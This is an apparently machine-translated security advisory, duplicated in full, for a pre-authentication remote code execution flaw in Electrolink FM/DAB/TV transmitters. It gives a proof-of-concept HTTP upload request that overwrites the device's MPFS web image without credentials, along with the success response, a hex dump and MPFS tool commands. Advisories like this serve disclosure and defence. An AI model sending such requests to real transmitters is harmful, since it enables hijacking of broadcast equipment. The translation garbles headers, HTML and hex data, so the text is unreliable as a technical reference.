Electrolink FM/DAB/TV发送器Pre-auth MPFS图像远程代码执行
Vendor: Electolink S.R.L.
产品网页: https://www.electrolink.com
受影响的版本: 10W,100W,250W,紧凑型DAB发射器
500W,1kW,2kW中型DAB发射器
2.5kW,3kW,4kW,5kW高功率DAB发射器
100W,500W,1kW,2kW紧凑型FM发射机
3kW,5kW,10kW,15kW,20kW,30kW模块化FM发射器
15W -40kW数字FM发射器
BI,BIII VHF电视发射器
10W -5kW UHF电视发射器
Web版本: 01.09,01.08,01.07
显示版本: 1.4,1.2
控制单元版本: 01.06,01.04,01.03
固件版本: 2.1
摘要:自1990年以来Electrolink一直在处理设计和
广播和电视高级技术的制造
广播。最全面的产品系列包括: FM
发射机,DAB发射器,用于模拟和的电视发射机
数字多标准操作,带通滤波器(FM,DAB,ATV,
DTV),通道组合(FM,DAB,ATV,DTV),电动煤炭氧化
开关,手动补丁面板,RF电量计,刚性线和
配件。满足广播公司需求的专业解决方案
从小型社区电视或广播到大型政府网络。
紧凑型DAB发射器10W,100W和250W型号,具有3.5'
触摸屏显示和最先进的DAB模块的内置状态,
EDI输入和GPS接收器。所有发射器均配备
最先进的DAB调制器,表现出色,
自我保护和自我控制的放大器可确保无故障
不间断的操作。
100W,500W,1kW和2kW功率范围可在紧凑型2U上使用,并且
3U 19'帧。内置立体声编码器,触摸屏显示和
有效的低噪声空气冷却系统。可用型号: 3kw,
5kW,10kW,15kW,20kW和30kW。高效率FM发射器
具有完全宽带固态放大器和有效的
低噪声空气冷却系统。
FM数字调制器具有出色的规格,内置
立体声和RDS编码器。数字装饰限制器以及
提供ASI和SDI输入。这些发射器已经准备好
用于同源网络。
可用于VHF BI和VHF BIII操作,可实现强大的底饰
以及用户友好的本地和遥控器。多标准UHF
电视发射器从10W到5kW,有效的低噪声空气
冷却系统。模拟PAL,NTSC和数字DVB-T/T2,ATSC
和ISDB-TB可用。
DESC:该设备允许访问一个未受保护的端点
允许MPFS文件系统二进制图像上传而无需身份验证。
MPFS2文件系统模块提供了仅重量读取
可以存储在外部EEPROM中的文件系统,外部
串行闪光灯或内部闪存程序内存。此文件系统
用作HTTP2 Web服务器模块的基础,但也是
由SNMP模块使用,可用于其他应用程序
这需要基本的仅阅读存储功能。这可以
利用以覆盖闪存程序存储的存储
Web服务器的主要接口并执行任意代码。
在: MBEDTHIS-APPWEB/12.5.0上测试
MBEDTHIS-APPWEB/12.0.0
gjoko“ liquidworm” krstic发现的脆弱性
马其顿信息安全研究开发实验室
零科学实验室-https://www.zeroscience.mk- @Zeroscience
咨询ID: ZSL-2023-5796
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2023-5796.php
Ref: https://documentation.help/microchip-tcp.ip-inp.ip-stack/gs-mpfsupload.html
30.06.2023
- -
发布/上传HTTP /1.1
HOST: 192.168.150.77:8888
内容长度: 251
cache-control: max-age=0
content-type:多部分/form-data;边界=---- joxypoxy
用户代理: MPFS2_POC/1.0C
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie:登录=ignoremeplsktnx
连接:关闭
------- joxypoxy
content-disposition: form-data;名称='i';文件名='mpfsimg.bin'
content-type:应用程序/钟表流
MPFS . CGI二进制电话家
---- joxypoxy--
http/1.1 200好
连接:关闭
content-type:文本/html
htmlbody style='Margin:100px'BMPFS更新成功/bpa href='/'站点主页/a/a/hod/html
---
高清HTM:
0d 0a 4d 50 46 53 02 01 01 01 00 8A 43 20 00 00 00 mpfs . c .
2B 00 00 00 30 00 00 00 02 44 EB 64 00 00 00 00 00 +. 0 . D.D .
00 00 69 6E 64 65 78 32 2E 68 74 6D 00 3C 68 74 . INDEX0.HTM.HT
6d 6c 3e 0d 0a 3c 74 69 74 6c 6c 65 3e 5a 5a 53 4c 3c 3c ml.titlezsl
.
.
64 6f 73 21 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 2d dos!/html .-
---
MPFS结构:
[M] [P] [F]
[BYTE VER HI] [BYTE VER LO] [文件的单词号]
[名称哈希0] [name hash 1] . [name hash n]
[文件记录0] [文件记录1] . [文件记录n]
[字符串0] [字符串1] . [String n]
[文件数据0] [文件数据1] . [文件数据N]
---
C: \ javaw -jar mpfs2.jar
C: \ MPFS2 -V -L MPFSIMG.bin
版本: 2.1
文件数: 1(1常规,0索引)
动态变量的数量: 0
FILERECORD 0:
.stringptr=32 index0.htm
.dataptr=43
.len=48
.Timestamp=2023-08-27T14:39:30Z
.flags=0
Vendor: Electolink S.R.L.
产品网页: https://www.electrolink.com
受影响的版本: 10W,100W,250W,紧凑型DAB发射器
500W,1kW,2kW中型DAB发射器
2.5kW,3kW,4kW,5kW高功率DAB发射器
100W,500W,1kW,2kW紧凑型FM发射机
3kW,5kW,10kW,15kW,20kW,30kW模块化FM发射器
15W -40kW数字FM发射器
BI,BIII VHF电视发射器
10W -5kW UHF电视发射器
Web版本: 01.09,01.08,01.07
显示版本: 1.4,1.2
控制单元版本: 01.06,01.04,01.03
固件版本: 2.1
摘要:自1990年以来Electrolink一直在处理设计和
广播和电视高级技术的制造
广播。最全面的产品系列包括: FM
发射机,DAB发射器,用于模拟和的电视发射机
数字多标准操作,带通滤波器(FM,DAB,ATV,
DTV),通道组合(FM,DAB,ATV,DTV),电动煤炭氧化
开关,手动补丁面板,RF电量计,刚性线和
配件。满足广播公司需求的专业解决方案
从小型社区电视或广播到大型政府网络。
紧凑型DAB发射器10W,100W和250W型号,具有3.5'
触摸屏显示和最先进的DAB模块的内置状态,
EDI输入和GPS接收器。所有发射器均配备
最先进的DAB调制器,表现出色,
自我保护和自我控制的放大器可确保无故障
不间断的操作。
100W,500W,1kW和2kW功率范围可在紧凑型2U上使用,并且
3U 19'帧。内置立体声编码器,触摸屏显示和
有效的低噪声空气冷却系统。可用型号: 3kw,
5kW,10kW,15kW,20kW和30kW。高效率FM发射器
具有完全宽带固态放大器和有效的
低噪声空气冷却系统。
FM数字调制器具有出色的规格,内置
立体声和RDS编码器。数字装饰限制器以及
提供ASI和SDI输入。这些发射器已经准备好
用于同源网络。
可用于VHF BI和VHF BIII操作,可实现强大的底饰
以及用户友好的本地和遥控器。多标准UHF
电视发射器从10W到5kW,有效的低噪声空气
冷却系统。模拟PAL,NTSC和数字DVB-T/T2,ATSC
和ISDB-TB可用。
DESC:该设备允许访问一个未受保护的端点
允许MPFS文件系统二进制图像上传而无需身份验证。
MPFS2文件系统模块提供了仅重量读取
可以存储在外部EEPROM中的文件系统,外部
串行闪光灯或内部闪存程序内存。此文件系统
用作HTTP2 Web服务器模块的基础,但也是
由SNMP模块使用,可用于其他应用程序
这需要基本的仅阅读存储功能。这可以
利用以覆盖闪存程序存储的存储
Web服务器的主要接口并执行任意代码。
在: MBEDTHIS-APPWEB/12.5.0上测试
MBEDTHIS-APPWEB/12.0.0
gjoko“ liquidworm” krstic发现的脆弱性
马其顿信息安全研究开发实验室
零科学实验室-https://www.zeroscience.mk- @Zeroscience
咨询ID: ZSL-2023-5796
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2023-5796.php
Ref: https://documentation.help/microchip-tcp.ip-inp.ip-stack/gs-mpfsupload.html
30.06.2023
- -
发布/上传HTTP /1.1
HOST: 192.168.150.77:8888
内容长度: 251
cache-control: max-age=0
content-type:多部分/form-data;边界=---- joxypoxy
用户代理: MPFS2_POC/1.0C
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie:登录=ignoremeplsktnx
连接:关闭
------- joxypoxy
content-disposition: form-data;名称='i';文件名='mpfsimg.bin'
content-type:应用程序/钟表流
MPFS . CGI二进制电话家
---- joxypoxy--
http/1.1 200好
连接:关闭
content-type:文本/html
htmlbody style='Margin:100px'BMPFS更新成功/bpa href='/'站点主页/a/a/hod/html
---
高清HTM:
0d 0a 4d 50 46 53 02 01 01 01 00 8A 43 20 00 00 00 mpfs . c .
2B 00 00 00 30 00 00 00 02 44 EB 64 00 00 00 00 00 +. 0 . D.D .
00 00 69 6E 64 65 78 32 2E 68 74 6D 00 3C 68 74 . INDEX0.HTM.HT
6d 6c 3e 0d 0a 3c 74 69 74 6c 6c 65 3e 5a 5a 53 4c 3c 3c ml.titlezsl
.
.
64 6f 73 21 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 2d dos!/html .-
---
MPFS结构:
[M] [P] [F]
[BYTE VER HI] [BYTE VER LO] [文件的单词号]
[名称哈希0] [name hash 1] . [name hash n]
[文件记录0] [文件记录1] . [文件记录n]
[字符串0] [字符串1] . [String n]
[文件数据0] [文件数据1] . [文件数据N]
---
C: \ javaw -jar mpfs2.jar
C: \ MPFS2 -V -L MPFSIMG.bin
版本: 2.1
文件数: 1(1常规,0索引)
动态变量的数量: 0
FILERECORD 0:
.stringptr=32 index0.htm
.dataptr=43
.len=48
.Timestamp=2023-08-27T14:39:30Z
.flags=0